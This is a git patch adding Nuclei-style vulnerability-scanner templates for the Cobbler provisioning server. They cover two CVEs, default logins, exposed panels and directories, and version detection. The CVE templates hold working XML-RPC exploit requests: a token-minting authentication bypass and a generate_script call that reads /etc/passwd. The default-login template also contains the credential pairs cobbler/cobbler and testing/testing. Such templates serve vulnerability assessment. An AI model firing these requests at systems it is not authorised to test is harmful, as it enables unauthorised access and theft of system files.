From 99c131b1a63852645f7475e0cd1e2addf9de518b Mon Sep 17 00:00:00 2001
From: Sandeep Singh <sandeep@projectdiscovery.io>
Date: Mon, 14 Feb 2022 22:50:32 +0530
Subject: [PATCH] Added Cobbler provisioning server Templates (#3698)

Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com>

Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com>
---
 cves/2018/CVE-2018-1000226.yaml               | 60 ++++++++++++
 cves/2021/CVE-2021-40323.yaml                 | 95 +++++++++++++++++++
 .../cobbler/cobbler-default-login.yaml        | 66 +++++++++++++
 exposed-panels/cobbler-webgui.yaml            | 31 ++++++
 .../cobbler-exposed-directory.yaml            | 27 ++++++
 technologies/cobbler-version.yaml             | 41 ++++++++
 6 files changed, 320 insertions(+)
 create mode 100644 cves/2018/CVE-2018-1000226.yaml
 create mode 100644 cves/2021/CVE-2021-40323.yaml
 create mode 100644 default-logins/cobbler/cobbler-default-login.yaml
 create mode 100644 exposed-panels/cobbler-webgui.yaml
 create mode 100644 misconfiguration/cobbler-exposed-directory.yaml
 create mode 100644 technologies/cobbler-version.yaml

diff --git a/cves/2018/CVE-2018-1000226.yaml b/cves/2018/CVE-2018-1000226.yaml
new file mode 100644
index 0000000000..c070e810a9
--- /dev/null
+++ b/cves/2018/CVE-2018-1000226.yaml
@@ -0,0 +1,60 @@
+id: CVE-2018-1000226
+
+info:
+  name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass
+  author: c-sh0
+  severity: critical
+  reference:
+    - https://github.com/cobbler/cobbler/issues/1916
+    - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2018-1000226
+    cwe-id: CWE-732
+  tags: cve,cve2018,cobbler,auth-bypass
+
+requests:
+  - raw:
+      - |
+        POST {{BaseURL}}/cobbler_api HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version='1.0'?>
+        <methodCall>
+          <methodName>_CobblerXMLRPCInterface__make_token</methodName>
+          <params>
+            <param>
+              <value>
+                <string>cobbler</string>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "Content-Type: text/xml"
+
+      - type: word
+        part: body
+        words:
+          - "<methodResponse>"
+
+      - type: dsl
+        dsl:
+          - "!contains(tolower(body), '<name>faultCode</name>')"
+
+      - type: regex
+        part: body
+        regex:
+          - "(.*[a-zA-Z0-9].+==)</string></value>"
diff --git a/cves/2021/CVE-2021-40323.yaml b/cves/2021/CVE-2021-40323.yaml
new file mode 100644
index 0000000000..934f0a17e6
--- /dev/null
+++ b/cves/2021/CVE-2021-40323.yaml
@@ -0,0 +1,95 @@
+id: CVE-2021-40323
+
+info:
+  name: Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method
+  severity: critical
+  author: c-sh0
+  reference:
+    - https://github.com/cobbler/cobbler/issues/2795
+    - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-40323
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2021-40323
+    cwe-id: CWE-94
+  tags: cve,cve2021,cobbler,rce
+
+requests:
+  - raw:
+      - |
+        POST {{BaseURL}}/cobbler_api HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version='1.0'?>
+        <methodCall>
+          <methodName>find_profile</methodName>
+          <params>
+            <param>
+              <value>
+                <struct>
+                  <member>
+                    <name>name</name>
+                    <value>
+                      <string>*</string>
+                    </value>
+                  </member>
+                </struct>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+      - |
+        POST {{BaseURL}}/cobbler_api HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version='1.0'?>
+        <methodCall>
+          <methodName>generate_script</methodName>
+          <params>
+            <param>
+              <value>
+                <string>{{profile}}</string>
+              </value>
+            </param>
+            <param>
+              <value>
+                <string></string>
+              </value>
+            </param>
+            <param>
+              <value>
+                <string>/etc/passwd</string>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+    extractors:
+      - type: regex
+        name: profile
+        internal: true
+        group: 1
+        regex:
+          - '<value><string>(.*?)</string></value>'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - 'text/xml'
+
+      - type: regex
+        regex:
+          - "root:.*:0"
+          - "bin:.*:1"
+          - "nobody:.*:99"
+        condition: or
\ No newline at end of file
diff --git a/default-logins/cobbler/cobbler-default-login.yaml b/default-logins/cobbler/cobbler-default-login.yaml
new file mode 100644
index 0000000000..a92b21065f
--- /dev/null
+++ b/default-logins/cobbler/cobbler-default-login.yaml
@@ -0,0 +1,66 @@
+id: cobbler-default-login
+
+info:
+  name: Cobbler Default Login
+  author: c-sh0
+  reference:
+    - https://github.com/cobbler/cobbler/issues/2307
+    - https://github.com/cobbler/cobbler/issues/2909
+  severity: high
+  tags: cobbler,default-login,api
+
+requests:
+  - raw:
+      - |
+        POST {{BaseURL}}/cobbler_api HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+        <?xml version='1.0'?>
+        <methodCall>
+          <methodName>login</methodName>
+          <params>
+            <param>
+              <value>
+                <string>{{username}}</string>
+              </value>
+            </param>
+            <param>
+              <value>
+                <string>{{password}}</string>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+    attack: pitchfork
+    payloads:
+      username:
+        - cobbler
+        - testing
+      password:
+        - cobbler
+        - testing
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - 'text/xml'
+
+      - type: dsl
+        dsl:
+          - "!contains(tolower(body), '<name>faultCode</name>')"
+          - "!contains(tolower(body), 'login failed')"
+        condition: or
+
+      - type: regex
+        part: body
+        regex:
+          - "(.*[a-zA-Z0-9].+==)</string></value>"
diff --git a/exposed-panels/cobbler-webgui.yaml b/exposed-panels/cobbler-webgui.yaml
new file mode 100644
index 0000000000..abd7d4d1bc
--- /dev/null
+++ b/exposed-panels/cobbler-webgui.yaml
@@ -0,0 +1,31 @@
+id: cobbler-webgui
+
+info:
+  name: Cobbler WebGUI Detection
+  author: c-sh0
+  description: Detection of Cobbler WebGUI
+  severity: info
+  metadata:
+    shodan-query: http.title:"Cobbler Web Interface"
+  tags: cobbler,webserver,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cobbler_web"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "<title>Cobbler Web Interface</title>"
+          - "/cobbler_webui_content/"
+          - "/cobbler_web/do_login"
+        condition: or
diff --git a/misconfiguration/cobbler-exposed-directory.yaml b/misconfiguration/cobbler-exposed-directory.yaml
new file mode 100644
index 0000000000..34ce9c6f77
--- /dev/null
+++ b/misconfiguration/cobbler-exposed-directory.yaml
@@ -0,0 +1,27 @@
+id: cobbler-exposed-directory
+
+info:
+  name: Exposed Cobbler Directories
+  author: c-sh0
+  severity: medium
+  description: Searches for exposed Cobbler Directories
+  tags: cobbler,exposure,misconfig
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cobbler/"
+      - "{{BaseURL}}/cblr/"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "Index of /cobbler"
+          - "Index of /cblr"
+        condition: or
diff --git a/technologies/cobbler-version.yaml b/technologies/cobbler-version.yaml
new file mode 100644
index 0000000000..f7204a91d5
--- /dev/null
+++ b/technologies/cobbler-version.yaml
@@ -0,0 +1,41 @@
+id: cobbler-version
+
+info:
+  name: Cobbler Version Detection
+  author: c-sh0
+  severity: info
+  description: Obtain cobbler version information
+  tags: tech,cobbler,api
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/cobbler_api"
+
+    body: |
+        <?xml version='1.0'?>
+        <methodCall>
+        <methodName>extended_version</methodName>
+        <params></params>
+        </methodCall>
+
+    headers:
+      Content-Type: text/xml
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '<name>version</name>'
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "<value><string>([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})</string></value>"
\ No newline at end of file